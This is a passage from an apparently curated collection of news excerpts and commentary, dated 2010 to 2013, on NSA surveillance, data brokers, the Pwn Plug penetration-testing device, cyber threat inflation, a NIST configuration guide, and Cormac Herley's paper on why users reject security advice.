It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea).
But the Der Spiegel report is based on information that is over five years old. The slide, dated January 2007 and last updated October 2008, claims that the agency requires close physical proximity to the iPhone to install DROPOUTJEEP.
“The initial release of DROPOUTJEEP will focus on installing the implant via close access methods,” the N.S.A. slide says. Then, “A remote installation capability will be pursued for a future release.”
Based on the timing of the report, the agency would have been targeting Apple’s iOS5 operating system. Apple released its latest iOS7 operating system last September.
[Dec 27, 2013] N.S.A. Phone Surveillance Is Lawful, Federal Judge Rules
In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”
NYTimes.com
The main dispute between Judge Pauley and Judge Leon was over how to interpret a 1979 Supreme Court decision, Smith v. Maryland, in which the court said a robbery suspect had no reasonable expectation that his right to privacy extended to the numbers dialed from his phone.
“Smith’s bedrock holding is that an individual has no legitimate expectation of privacy in information provided to third parties,” Judge Pauley wrote.
But Judge Leon said in his ruling that advances in technology and suggestions in concurring opinions in later Supreme Court decisions had undermined Smith. The government’s ability to construct a mosaic of information from countless records, he said, called for a new analysis of how to apply the Fourth Amendment’s prohibition of unreasonable government searches.
Judge Pauley disagreed. “The collection of breathtaking amounts of information unprotected by the Fourth Amendment does not transform that sweep into a Fourth Amendment search,” he wrote.
He acknowledged that “five justices appeared to be grappling with how the Fourth Amendment applies to technological advances” in a pair of 2012 concurrences in United States v. Jones. In that decision, the court unanimously rejected the use of a GPS device to track the movements of a drug suspect over a month. The majority in the 2012 case said that attaching the device violated the defendant’s property rights.
In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”
But Judge Pauley wrote that the 2012 decision did not overrule the one from 1979. “The Supreme Court,” he said, “has instructed lower courts not to predict whether it would overrule a precedent even if its reasoning has been supplanted by later cases.”
As for changes in technology, he wrote, customers’ “relationship with their telecommunications providers has not changed and is just as frustrating.”
[Dec 27, 2013] What Surveillance Valley knows about you By Yasha Levine
December 22, 2013 Crooks and Liars
“In 2012, the data broker industry generated 150 billion in revenue that’s twice the size of the entire intelligence budget of the United States government—all generated by the effort to detail and sell information about our private lives.”
— Senator Jay Rockefeller IV“Quite simply, in the digital age, data-driven marketing has become the fuel on which America’s free market engine runs.”
— Direct Marketing Association
* * *
Google is very secretive about the exact nature of its for-profit intel operation and how it uses the petabytes of data it collects on us every single day for financial gain. Fortunately, though, we can get a sense of the kind of info that Google and other Surveillance Valley megacorps compile on us, and the ways in which that intel might be used and abused, by looking at the business practices of the “data broker” industry.
Thanks to a series of Senate hearings, the business of data brokerage is finally being understood by consumers, but the industry got its start back in the 1970s as a direct outgrowth of the failure of telemarketing. In its early days, telemarketing had an abysmal success rate: only 2 percent of people contacted would become customers. In his book, “The Digital Perso,” Daniel J. Solove explains what happened next:
To increase the low response rate, marketers sought to sharpen their targeting techniques, which required more consumer research and an effective way to collect, store, and analyze information about consumers. The advent of the computer database gave marketers this long sought-after ability — and it launched a revolution in targeting technology.
Data brokers rushed in to fill the void. These operations pulled in information from any source they could get their hands on — voter registration, credit card transactions, product warranty information, donations to political campaigns and non-profits, court records — storing it in master databases and then analyzing it in all sorts of ways that could be useful to direct-mailing and telemarketing outfits. It wasn’t long before data brokers realized that this information could be used beyond telemarketing, and quickly evolved into a global for-profit intelligence business that serves every conceivable data and intelligence need.
Today, the industry churns somewhere around $200 billion in revenue annually. There are up to 4,000 data broker companies — some of the biggest are publicly traded — and together, they have detailed information on just about every adult in the western world.
No source of information is sacred: transaction records are bought in bulk from stores, retailers and merchants; magazine subscriptions are recorded; food and restaurant preferences are noted; public records and social networks are scoured and scraped. What kind of prescription drugs did you buy? What kind of books are you interested in? Are you a registered voter? To what non-profits do you donate? What movies do you watch? Political documentaries? Hunting reality TV shows?
That info is combined and kept up to date with address, payroll information, phone numbers, email accounts, social security numbers, vehicle registration and financial history. And all that is sliced, isolated, analyzed and mined for data about you and your habits in a million different ways.
The dossiers are not restricted to generic market segmenting categories like “Young Literati” or “Shotguns and Pickups” or “Kids & Cul-de-Sacs,” but often contain the most private and intimate details about a person’s life, all of it packaged and sold over and over again to anyone willing to pay.
Take MEDbase200, a boutique for-profit intel outfit that specializes in selling health-related consumer data. Well, until last week, the company offered its clients a list of rape victims (or “rape sufferers,” as the company calls them) at the low price of $79.00 per thousand. The company claims to have segmented this data set into hundreds of different categories, including stuff like the ailments they suffer, prescription drugs they take and their ethnicity:
These rape sufferers are family members who have reported, or have been identified as individuals affected by specific illnesses, conditions or ailments relating to rape. Medbase200 is the owner of this list. Select from families affected by over 500 different ailments, and/or who are consumers of over 200 different Rx medications. Lists can be further selected on the basis of lifestyle, ethnicity, geo, gender, and much more. Inquire today for more information.
MEDbase promptly took its “rape sufferers” list off line last week after its existence was revealed in a Senate investigation into the activities of the data-broker industry. The company pretended like the list was a huge mistake. A MEDbase rep tried convincing a Wall Street Journal reporter that its rape dossiers were just a “hypothetical list of health conditions/ailments.” The rep promised it was never sold to anyone. Yep, it was a big mistake. We can all rest easy now. Thankfully, MEDbase has hundreds of other similar dossier collections, hawking the most private and sensitive medical information.
For instance, if lists of rape victims aren’t your thing, MEDbase can sell dossiers on people suffering from anorexia, substance abuse, AIDS and HIV, Alzheimer’s Disease, Asperger Disorder, Attention Deficit Hyperactivity Disorder, Bedwetting (Enuresis), Binge Eating Disorder, Depression, Fetal Alcohol Syndrome, Genital Herpes, Genital Warts, Gonorrhea, Homelessness, Infertility, Syphilis… the list goes on and on and on and on.
Normally, such detailed health information would fall under federal law and could not be disclosed or sold without consent. But because these data harvesters rely on indirect sources of information instead of medical records, they’re able to sidestep regulations put in place to protect the privacy of people’s health data.
MEBbase isn’t the only company exploiting these loopholes. By the industry’s own estimates, there are something like 4,000 for-profit intel companies operating in the United States. Many of them sell information that would normally be restricted under federal law. They offer all sorts of targeted dossier collections on every population segments of our society, from the affluent to the extremely vulnerable:
- people with drug addictions
- detailed personal info on police officers and other government employees
- people with bad credit/bankruptcies
- minorities who’ve used payday loan services
- domestic violence shelter locations (normally these addresses would be shielded by law)
- elderly gamblers
If you want to see how this kind of profile data can be used to scam unsuspecting individuals, look no further than a Richard Guthrie, an Iowa retiree who had his life savings siphoned out of his bank account. Their weapon of choice: databases bought from large for-profit data brokers listing retirees who entered sweepstakes and bought lottery tickets.
Here’s a 2007 New York Times story describing the racket:
Mr. Guthrie, who lives in Iowa, had entered a few sweepstakes that caused his name to appear in a database advertised by infoUSA, one of the largest compilers of consumer information. InfoUSA sold his name, and data on scores of other elderly Americans, to known lawbreakers, regulators say.
InfoUSA advertised lists of “Elderly Opportunity Seekers,” 3.3 million older people “looking for ways to make money,” and “Suffering Seniors,” 4.7 million people with cancer or Alzheimer’s disease. “Oldies but Goodies” contained 500,000 gamblers over 55 years old, for 8.5 cents apiece. One list said: “These people are gullible. They want to believe that their luck can change.”
Data brokers argue that cases like Guthrie are an anomaly — a once-in-a-blue-moon tragedy in an industry that takes privacy and legal conduct seriously. But cases of identity thieves and sophistical con-rings obtaining data from for-profit intel businesses abound. Scammers are a lucrative source of revenue. Their money is just as good as anyone else’s. And some of the profile “products” offered by the industry seem tailored specifically to fraud use.
As Royal Canadian Mounted Police Sergeant Yves Leblanc told the New York Times: “Only one kind of customer wants to buy lists of seniors interested in lotteries and sweepstakes: criminals. If someone advertises a list by saying it contains gullible or elderly people, it’s like putting out a sign saying ‘Thieves welcome here.’”
So what is InfoUSA, exactly? What kind of company would create and sell lists customized for use by scammers and cons?
As it turns out, InfoUSA is not some fringe or shady outfit, but a hugely profitable politically connected company. InfoUSA was started by Vin Gupta in the 1970s as a basement operation hawking detailed lists of RV and mobile home dealers. The company quickly expanded into other areas and began providing business intel services to thousands of businesses. By 2000, the company raised more than $30 million in venture capital funding from major Silicon Valley venture capital firms.
By then, InfoUSA boasted of having information on 230 million consumers. A few years later, InfoUSA counted the biggest Valley companies as its clients, including Google, Yahoo, Microsoft and AOL. It got involved not only in raw data and dossiers, but moved into payroll and financial, conducted polling and opinion research, partnered with CNN, vetted employees and provided customized services for law enforcement and all sorts of federal and government agencies: processing government payments, helping states locate tax cheats and even administrating President Bill Clinton “Welfare to Work” program. Which is not surprising, as Vin Gupta is a major and close political supporter of Bill and Hillary Clinton.
In 2008, Gupta was sued by InfoUSA shareholders for inappropriately using corporate funds. Shareholders accused of Gupta of illegally funneling corporate money to fund an extravagant lifestyle and curry political favor. According to the Associated Press, the lawsuit questioned why Gupta used private corporate jets to fly the Clintons on personal and campaign trips, and why Gupta awarded Bill Clinton a $3.3 million consulting gig.
As a result of the scandal, InfoUSA was threatened with delisting from Nasdaq, Gupta was forced out and the company was snapped up for half a billion dollars by CCMP Capital Advisors, a major private equity firm spun off from JP Morgan in 2006. Today, InfoUSA continues to do business under the name Infogroup, and has nearly 4,000 employees working in nine countries.
As big as Infogroup is, there are dozens of other for-profit intelligence businesses that are even bigger: massive multi-national intel conglomerates with revenues in the billions of dollars. Some of them, like Lexis-Nexis and Experian, are well known, but mostly these are outfits that few Americans have heard of, with names like Epsilon, Altegrity and Acxiom.
These for-profit intel behemoths are involved in everything from debt collection to credit reports to consumer tracking to healthcare analysis, and provide all manner of tailored services to government and law enforcement around the world. For instance, Acxiom has done business with most major corporations, and boasts of intel on “500 million active consumers worldwide, with about 1,500 data points per person. That includes a majority of adults in the United States,” according to the New York Times.
This data is analyzed and sliced in increasingly sophisticated and intrusive ways to profile and predict behavior. Merchants are using it customize shopping experience— Target launched a program to figure out if a woman shopper was pregnant and when the baby would be born, “even if she didn’t want us to know.” Life insurance companies are experimenting with predictive consumer intel to estimate life expectancy and determine eligibility for life insurance policies. Meanwhile, health insurance companies are raking over this data in order to deny and challenge the medical claims of their policyholders.
Even more alarming, large employers are turning to for-profit intelligence to mine and monitor the lifestyles and habits of their workers outside the workplace. Earlier this year, the Wall Street Journal described how employers have partnered with health insurance companies to monitor workers for “health-adverse” behavior that could lead to higher medical expenses down the line:
Your company already knows whether you have been taking your meds, getting your teeth cleaned and going for regular medical checkups. Now some employers or their insurance companies are tracking what staffers eat, where they shop and how much weight they are putting on — and taking action to keep them in line.
But companies also have started scrutinizing employees’ other behavior more discreetly. Blue Cross and Blue Shield of North Carolina recently began buying spending data on more than 3 million people in its employer group plans. If someone, say, purchases plus-size clothing, the health plan could flag him for potential obesity — and then call or send mailings offering weight-loss solutions.
…”Everybody is using these databases to sell you stuff,” says Daryl Wansink, director of health economics for the Blue Cross unit. “We happen to be trying to sell you something that can get you healthier.”
“As an employer, I want you on that medication that you need to be on,” says Julie Stone, a HR expert at Towers Watson told the Wall Street Journal.
Companies might try to frame it as a health issue. I mean, what kind of asshole could be against employers caring about the wellbeing of their workers? But their ultimate concern has nothing to do with the employee health. It’s all about the brutal bottom line: keeping costs down.
An employer monitoring and controlling your activity outside of work? You don’t have to be union agitator to see the problems with this kind of mindset and where it could lead. Because there are lots of things that some employers might want to know about your personal life, and not only to “keep costs down.” It could be anything: to weed out people based on undesirable habits or discriminate against workers based on sexual orientation, regulation and political beliefs.
It’s not difficult to imagine that a large corporation facing a labor unrest or a unionization drive would be interested in proactively flagging potential troublemakers by pinpointing employees that might be sympathetic to the cause. But the technology and data is already here for wide and easy application: did a worker watch certain political documentaries, donate to environmental non-profits, join an animal rights Facebook group, tweet out support for Occupy Wall Street, subscribe to the Nation or Jacobin, buy Naomi Klein’s “Shock Doctrine”? Or maybe the worker simply rented one of Michael Moore’s films? Run your payroll through one of the massive consumer intel databases and look if there is any matchup. Bound to be plenty of unpleasant surprises for HR!
This has happened in the past, although in a cruder and more limited way. In the 1950s, for instance, some lefty intellectuals had their lefty newspapers and mags delivered to P.O. boxes instead of their home address, worrying that otherwise they’d get tagged as Commie symps. That might have worked in the past. But with the power of private intel companies, today there’s nowhere to hide.
FTC Commissioner Julie Brill has repeatedly voiced concern that unregulated data being amassed by for-profit intel companies would be used to discriminate and deny employment, and to determine consumer access to everything from credit to insurance to housing. “As Big Data algorithms become more accurate and powerful, consumers need to know a lot more about the ways in which their data is used,” she told the Wall Street Journal.
Pam Dixon, executive director of the Privacy World Forum, agrees. Dixon frequently testifies on Capitol Hill to warn about the growing danger to privacy and civil liberties posed by big data and for-profit intelligence. In Congressional testimony back in 2009, Dixon called this growing mountain of data the “modern permanent record” and explained that users of these new intel capabilities will inevitably expand to include not just marketers and law enforcement, but insurance companies, employers, landlords, schools, parents, scammers and stalkers. “The information – like credit reports – will be used to make basic decisions about the ability of individual to travel, participate in the economy, find opportunities, find places to live, purchase goods and services, and make judgments about the importance, worthiness, and interests of individuals.”
* * *
For the past year, Chairman John D. (Jay) Rockefeller IV has been conducting a Senate Commerce Committee investigation of the data broker industry and how it affects consumers. The committee finished its investigation last week without reaching any real conclusions, but issued a report warning about the dangers posed by the for-profit intel industry and the need for further action by lawmakers. The report noted with concern that many of these firms failed to cooperate with the investigation into their business practices:
Data brokers operate behind a veil of secrecy. Three of the largest companies – Acxiom, Experian, and Epsilon – to date have been similarly secretive with the Committee with respect to their practices, refusing to identify the specific sources of their data or the customers who purchase it. … The refusal by several major data broker companies to provide the Committee complete responses regarding data sources and customers only reinforces the aura of secrecy surrounding the industry.
Rockefeller’s investigation was an important first step breaking open this secretive industry, but it was missing one notable element. Despite its focus on companies that feed on people’s personal data, the investigation did not include Google or the other big Surveillance Valley data munchers. And that’s too bad. Because if anything, the investigation into data brokers only highlighted the danger posed by the consumer-facing data companies like Google, Facebook, Yahoo and Apple.
As intrusive as data brokers are, the level of detail in the information they compile on Americans pales to what can be vacuumed up by a company like Google. To compile their dossiers, traditional data brokers rely on mostly indirect intel: what people buy, where they vacation, what websites they visit. Google, on the other hand, has access to the raw uncensored contents of your inner life: personal emails, chats, the diary entries and medical records that we store in the cloud, our personal communication with doctors, lawyers, psychologists, friends. Data brokers know us through our spending habits. Google accesses the unfiltered details of our personal lives.
A recent study showed that Americans are overwhelmingly opposed to having their online activity tracked and analyzed. Seventy-three percent of people polled for the Pew Internet & American Life Project viewed the tracking of their search history as an invasion of privacy, while 68 percent were against targeted advertising, replying: “I don’t like having my online behavior tracked and analyzed.”
This isn’t news to companies like Google, which last year warned shareholders: “Privacy concerns relating to our technology could damage our reputation and deter current and potential users from using our products and services.”
Little wonder then that Google, and the rest of Surveillance Valley, is terrified that the conversation about surveillance could soon broaden to include not only government espionage, but for-profit spying as well.
[Jul 23, 2012] The Onion Facebook Is CIA's Dream Come True [SATIRE] by Stan Schroeder
Compare with Assange- Facebook, Google, Yahoo spying tools for US intelligence
As the “single most powerful tool for population control,” the CIA’s “Facebook program” has dramatically reduced the agency’s costs — at least according to the latest “report” from the satirical mag The Onion.
Perhaps inspired by a recent interview with WikiLeaks founder Julian Assange, who called Facebook “the most appalling spy machine that has ever been invented,” The Onion‘s video fires a number of arrows in Facebook’s direction — with hilarious results.
In the video, Facebook founder Mark Zuckerberg is dubbed “The Overlord” and is shown receiving a “medal of intelligence commendation” for his work with the CIA’s Facebook program.
The Onion also takes a jab at FarmVille (which is responsible for “pacifying” as much as 85 million people after unemployment rates rose), Twitter (which is called useless as far as data gathering goes), and Foursquare (which is said to have been created by Al Qaeda).
Check out the video below and tell us in the comments what you think.
CIA's 'Facebook' Program Dramatically Cut Agency's Costs Onion News Network
[Apr 17, 2012] The Pwn Plug is a little white box that can hack your network By Robert McMillan,
wired.comEasy to overlook, the PwnPlug offers a tiny back door to the corporate network
When Jayson E. Street broke into the branch office of a national bank in May of last year, the branch manager could not have been more helpful. Dressed like a technician, Street walked in and said he was there to measure "power fluctuations on the power circuit." To do this, he'd need to plug a small white device that looked like a power adapter onto the wall.
The power fluctuation story was total BS, of course. Street had been hired by the bank to test out security at 10 of its West Coast branch offices. He was conducting what's called a penetration test. This is where security experts pretend to be bad guys in order to spot problems.
In this test, bank employees were only too willing to help out. They let Street go anywhere he wanted—near the teller windows, in the vault—and plug in his little white device, called a Pwn Plug.
"At one branch, the bank manager got out of the way so I could put it behind her desk," Street says. The bank, which Street isn't allowed to name, called the test off after he'd broken into the first four branches. "After the fourth one they said, 'Stop now please. We give up.'"
Built by a startup company called Pwnie Express, the Pwn Plug is pretty much the last thing you ever want to find on your network—unless you've hired somebody to put it there. It's a tiny computer that comes preloaded with an arsenal of hacking tools. It can be quickly plugged into any computer network and then used to access it remotely from afar. And it comes with "stealthy decal stickers"—including a little green flowerbud with the word "fresh" underneath it, that makes the device look like an air freshener—so that people won't get suspicious.
The Pwn Plug installed during Street's May penetration test
Jayson E. StreetThe basic model costs $480, but if you're willing to pay an extra $250 for the Elite version, you can connect it over the mobile wireless network. "The whole point is plug and pwn," says Dave Porcello, Pwnie Express's CEO. "Walk into a facility, plug it in, wait for the text message. Before you even get to the parking lot you should know it's working."
Porcello decided to start making the Pwn Plug after coming across the SheevaPlug, a miniature low-power Linux computer built by Globalscale Technologies that looks just like a power adapter. "I saw it and I was like, 'Oh my god this is the hacker's dropbox,'" Porcello says. Dropboxes have been around for a few decades, but until now they've been customized computers that hackers or pen testers like Street build and sneak, unobserved onto corporate networks.
Now Pwnie Express has taken the idea commercial and built a product that anyone can easily configure and use. It turns out that they're also a great way for corporations to test out security at their regional offices. Porcellos says that the Bank of America is mailing the Pwn Plug to its regional offices and having bank mangers plug them into the network. Then security experts at corporate HQ can check the network for vulnerabilities.
Another Internet service provider—Porcello wasn't allowed to name it—is using the devices to remotely connect to regional offices via a GSM mobile wireless network and troubleshoot networking problems.
The device can save companies big money, Porcello says. "You've got companies like T.J.Maxx that have thousands of retail stores and every single one of them has got a computer network," he says. "Right now they're actually flying people out to the stores to spot check and do penetration basis, but now with something like this you don't have to travel."
Porcello was just a bored security manager at an insurance company when he started building the Pwn Plugs back in 2010. But pretty soon he was selling enough to quit his day job. "We started getting orders from Fortune 50 companies and the DoD and I was like, 'OK I'll do this now instead.'"
[Feb 15, 2012] Cyberwar Is the New Yellowcake Threat Level By Jerry Brito and Tate Watkins
Now all this needs to reassessed using latest NSA revelations...
February 14, 2012 | Wired.com
In last month’s State of the Union address, President Obama called on Congress to pass “legislation that will secure our country from the growing dangers of cyber threats.” The Hill was way ahead of him, with over 50 cybersecurity bills introduced this Congress. This week, both the House and Senate are moving on their versions of consolidated, comprehensive legislation.
The reason cybersecurity legislation is so pressing, proponents say, is that we face an immediate risk of national disaster.
“Today’s cyber criminals have the ability to interrupt life-sustaining services, cause catastrophic economic damage, or severely degrade the networks our defense and intelligence agencies rely on,” Senate Commerce Committee Chairman Jay Rockefeller (D-W.Va.) said at a hearing last week. “Congress needs to act on comprehensive cybersecurity legislation immediately.”
Yet evidence to sustain such dire warnings is conspicuously absent. In many respects, rhetoric about cyber catastrophe resembles threat inflation we saw in the run-up to the Iraq War. And while Congress’ passing of comprehensive cybersecurity legislation wouldn’t lead to war, it could saddle us with an expensive and overreaching cyber-industrial complex.
In 2002 the Bush administration sought to make the case that Iraq threatened its neighbors and the United States with weapons of mass destruction (WMD). By framing the issue in terms of WMD, the administration conflated the threats of nuclear, biological, and chemical weapons. The destructive power of biological and chemical weapons—while no doubt horrific—is minor compared to that of nuclear detonation. Conflating these threats, however, allowed the administration to link the unlikely but serious threat of a nuclear attack to the more likely but less serious threat posed by biological and chemical weapons.
Similarly, proponents of regulation often conflate cyber threats.
In his 2010 bestseller Cyber War, Richard Clarke warns that a cyberattack today could result in the collapse of the government’s classified and unclassified networks, the release of “lethal clouds of chlorine gas” from chemical plants, refinery fires and explosions across the country, midair collisions of 737s, train derailments, the destruction of major financial computer networks, suburban gas pipeline explosions, a nationwide power blackout, and satellites in space spinning out of control. He assures us that “these are not hypotheticals.” But the only verifiable evidence he presents relates to several well-known distributed denial of service (DDOS) attacks, and he admits that DDOS is a “primitive” form of attack that would not pose a major threat to national security.
When Clarke ventures beyond DDOS attacks, his examples are easily debunked. To show that the electrical grid is vulnerable, for example, he suggests that the Northeast power blackout of 2003 was caused in part by the “Blaster” worm. But the 2004 final report of the joint U.S.-Canadian task force that investigated the blackout found that no virus, worm, or other malicious software contributed to the power failure. Clarke also points to a 2007 blackout in Brazil, which he says was the result of criminal hacking of the power system. Yet investigations have concluded that the power failure was the result of soot deposits on high-voltage insulators on transmission lines.
Clarke’s readers would no doubt be as frightened at the prospect of a cyber attack as they might have been at the prospect of Iraq passing nuclear weapons to al Qaeda. Yet evidence that cyberattacks and cyberespionage are real and serious concerns is not evidence that we face a grave risk of national catastrophe, just as evidence of chemical or biological weapons is not evidence of the ability to launch a nuclear strike.
The Bush administration claimed that Iraq was close to acquiring nuclear weapons but provided no verifiable evidence. The evidence they did provide—Iraq’s alleged pursuit of uranium “yellowcake” from Niger and its purchase of aluminum tubes allegedly meant for uranium enrichment centrifuges—was ultimately determined to be unfounded.
Despite the lack of verifiable evidence to support the administration’s claims, the media tended to report them unquestioned. Initial reporting on the aluminum tubes claim, for example, came in the form of a front page New York Times article by Judith Miller and Michael Gordon that relied entirely on anonymous administration sources.
Appearing on Meet the Press the same day the story was published, Vice President Dick Cheney answered a question about evidence of a reconstituted Iraqi nuclear program by stating that, while he couldn’t talk about classified information, The New York Times was reporting that Iraq was seeking to acquire aluminum tubes to build a centrifuge. In essence, the Bush administration was able to cite its own leak—with the added imprimatur of the Times—as a rationale for war.
The media may be contributing to threat inflation today by uncritically reporting alarmist views of potential cyber threats. For example, a 2009 front page Wall Street Journal story reported that the U.S. power grid had been penetrated by Chinese and Russian hackers and laced with logic bombs. The article is often cited as evidence that the power grid is rigged to blow.
Yet similar to Judith Miller’s Iraq WMD reporting, the only sources for the article’s claim that infrastructure has been compromised are anonymous U.S. intelligence officials. With little specificity about the alleged infiltrations, readers are left with no way to verify the claims. More alarmingly, when Sen. Susan Collins (R-Maine) took to the Senate floor to introduce the comprehensive cybersecurity bill that she co-authored with Sen. Joe Lieberman (I-Conn.), the evidence she cited to support a pressing need for regulation included this very Wall Street Journal story.
Washington teems with people who have a vested interest in conflating and inflating threats to our digital security. The watchword, therefore, should be “trust but verify.” In his famous farewell address to the nation in 1961, President Dwight Eisenhower warned against the dangers of what he called the “military-industrial complex”: an excessively close nexus between the Pentagon, defense contractors, and elected officials that could lead to unnecessary expansion of the armed forces, superfluous military spending, and a breakdown of checks and balances within the policy making process. Eisenhower’s speech proved prescient.
Cybersecurity is a big and booming industry. The U.S. government is expected to spend $10.5 billion a year on information security by 2015, and analysts have estimated the worldwide market to be as much as $140 billion a year. The Defense Department has said it is seeking more than $3.2 billion in cybersecurity funding for 2012. Lockheed Martin, Boeing, L-3 Communications, SAIC, and BAE Systems have all launched cybersecurity divisions in recent years. Other traditional defense contractors, such as Northrop Grumman, Raytheon, and ManTech International, have invested in information security products and services. We should be wary of proving Eisenhower right again in the cyber sphere.
Before enacting sweeping changes to counter cyber threats, policy makers should clear the air with some simple steps.
Stop the apocalyptic rhetoric. The alarmist scenarios dominating policy discourse may be good for the cybersecurity-industrial complex, but they aren’t doing real security any favors.
Declassify evidence relating to cyber threats. Overclassification is a widely acknowledged problem, and declassification would allow the public to verify the threats rather than blindly trusting self-interested officials.
Disentangle the disparate dangers that have been lumped together under the “cybersecurity” label. This must be done to determine who is best suited to address which threats. In cases of cybercrime and cyberespionage, for instance, private network owners may be best suited and have the best incentives to protect their own valuable data, information, and reputations.
UPDATE 2.14.12: Story was updated to correct the name of the worm that was supposed to have affected the Northeast power grid.
draft_sp800-128-ipd.pdf (850 KB) DRAFT Guide for Security Configuration Management of Information Systems
March 2010 | NIST
NIST announces the publication of Initial Public Draft Special Publication 800-128, Guide for Security Configuration Management of Information Systems. The publication provides guidelines for managing the configuration of information system architectures and associated components for secure processing, storing, and transmitting of information. Security configuration management is an important function for establishing and maintaining secure information system configurations, and provides important support for managing organizational risks in information systems.
NIST SP 800-128 identifies the major phases of security configuration management and describes the process of applying security configuration management practices for information systems including: (i) planning security configuration management activities for the organization; (ii) planning security configuration management activities for the information system; (iii) configuring the information system to a secure state; (iv) maintaining the configuration of the information system in a secure state; and (iv) monitoring the configuration of the information system to ensure that the configuration is not inadvertently altered from its approved state.
The security configuration management concepts and principles described in this publication provide supporting information for NIST SP 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations that include the Configuration Management family of security controls and other security controls that draw upon configuration management activities in implementing those controls. This publication also provides important supporting information for the Monitor Step (Step 6) of the Risk Management Framework that is discussed in NIST SP 800-37, Revision 1, Guide for Applying the Risk Management Framework to Federal Information Systems: A Security Life Cycle Approach.
NIST requests comments on the Initial Public Draft of Special Publication 800-128, by June 14, 2010. Please submit comments to [email protected].
[May 08, 2010] Are users right in rejecting security advice
TechRepublic.com
I now understand why my friend insisted I listen to Episode 229 of the Security Now series. He wanted to introduce me to Cormac Herley, Principle Researcher at Microsoft and his paper, “So Long, and No Thanks for the Externalities: The Rational Rejection of Security Advice by Users.”
Dr. Herley introduced the paper this past September at the New Security Paradigms Workshop, a fitting venue. See if you agree after reading the group’s mandate:
“NSPW’s focus is on work that challenges the dominant approaches and perspectives in computer security. In the past, such challenges have taken the form of critiques of existing practice as well as novel, sometimes controversial, and often immature approaches to defending computer systems.
By providing a forum for important security research that isn’t suitable for mainstream security venues, NSPW aims to foster paradigm shifts in information security.”
Herley’s paper is of special interest to the group. Not only does it meet one of NSPW’s tenets of being outside the mainstream. It forces a rethink of what’s important when it comes to computer security.
Radical thinking
To get an idea of what the paper is about, here’s a quote from the introduction:
“We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort. Looking at various examples of security advice we find that the advice is complex and growing, but the benefit is largely speculative or moot.”
The above diagram (courtesy of Cormac Herley) shows what he considers as direct and indirect costs. So, is Herley saying that heeding advice about computer security is not worth it? Let’s find out.
Who’s right
Researchers have different ideas as to why people fail to use security measures. Some feel that regardless of what happens, users will only do the minimum required. Others believe security tasks are rejected because users consider them to be a pain. A third group maintains user education is not working.
Herley offers a different viewpoint. He contends that user rejection of security advice is based entirely on the economics of the process. He offers the following as reasons why:
- Users understand, there is no assurance that heeding advice will protect them from attacks.
- Users also know that each additional security measure adds cost.
- Users perceive attacks to be rare. Not so with security advice; it’s a constant burden, thus costs more than an actual attack.
To explain
As I read the paper, I sensed Herley was coaxing me to stop thinking like an IT professional and start thinking like a mainstream user. That way, I would understand the following:
- The sheer volume of advice is overwhelming. There is no way to keep up with it. Besides that, the advice is fluid. What’s right one day may not be the next. I agree, this link is to US-CERT security bulletins for just the week of March 1, 2010.
- The typical user does not always see benefit from heeding security advice. I once again agree. Try to explain to someone who had a password stolen by a key logger, why a strong password is important.
- The benefit of heeding security advice is speculative. I checked and could not find significant data on the number and severity of attacks users encounter. Let alone, data quantifying positive feedback from following security advice.
Cost versus benefit
I wasn’t making the connection between cost-benefit trade-offs and IT security. My son, an astute business-type, had to explain that costs and benefits do not always directly refer to financial gains or losses. After hearing that, things started making sense. One such cost analysis was described by Steve Gibson in the podcast.
Gibson simply asked, how often do you require passwords to be changed? I asked several system administrators what time frame they used, most responded once a month. Using Herley’s logic, that means an attacker potentially has a whole month to use the password.
So, is the cost of having users struggle with new password every month beneficial? Before you answer, you may also want to think about bad practices users implement because of the frequent-change policy:
- By the time a user is comfortable with a password, it’s time to change. So, users opt to write passwords down. That’s another whole debate; ask Bruce Schneier.
- Users know how many passwords the system remembers and cycle through that amount, which allows them to keep using the same one.
Is anything truly gained by having passwords changed often? The only benefit I see is if the attacker does not use the password within the password-refresh time limit. What’s your opinion? Is changing passwords monthly, a benefit or a cost?
Dr. Herley does an in-depth cost-benefit analysis in three specific areas, password rules, phishing URLs, and SSL certificate errors. I would like to spend some time with each.
Password rules
Password rules place the entire burden on the user. So, they understand the cost from having to abide by the following rules:
- Length
- Composition (e.g. digits, special characters)
- Non-dictionary words (in any language).
- Don’t write it down
- Don’t share it with anyone
- Change it often
- Don’t re-use passwords across sites
The report proceeds to explain how each rule is not really helpful. For example, the first three rules are not important, as most applications and Web sites have a lock out rule that restricts access after so many tries. I already touched on why “Change it often” is not considered helpful.
All said and done, users know that strictly observing the above rules is no guarantee of being safe from exploits. That makes it difficult for them to justify the additional effort and associated cost.
Phishing URLs
Trying to explain URL spoofing to users is complicated. Besides, by the time you get through half of all possible iterations, most users are not listening. For example, the following slide (courtesy of Cormac Herley) lists some spoofed URLs for PayPal:
To reduce cost to users, Herley wants to turn this around. He explains that users need to know when the URL is good, not bad:
“The main difficulty in teaching users to read URLs is that in certain cases this allows users to know when something is bad, but it never gives a guarantee that something is good. Thus the advice cannot be exhaustive and is full of exceptions.”
Certificate errors
For the most part, people understand SSL, the significance of https, and are willing to put up with the additional burden to keep their personal and financial information safe. Certificate errors are a different matter. Users do not understand their significance and for the most part ignore them.
I’m as guilty as the next when it comes to certificate warnings. I feel like I’m taking a chance, yet what other options are available? After reading the report, I am not as concerned. Why, statistics show that virtually all certificate errors are false positives.
The report also reflects the irony of thinking that ignored certificate warnings will lead to problems. Typically, bad guys do not use SSL on their phishing sites and if they do, they are going to make sure their certificates work, not wanting to bring any undue attention to their exploit. Herley states it this way:
“Even if 100% of certificate errors are false positives it does not mean that we can dispense with certificates. However, it does mean that for users the idea that certificate errors are a useful tool in protecting them from harm is entirely abstract and not evidence-based. The effort we ask of them is real, while the harm we warn them of is theoretical.”
Outside the box
There you have it. Is that radical-enough thinking for you? It is for me. That said, Dr. Herley offers the following advice:
“We do not wish to give the impression that all security advice is counter-productive. In fact, we believe our conclusions are encouraging rather than discouraging. We have argued that the cost-benefit trade off for most security advice is simply unfavorable: users are offered too little benefit for too much cost.
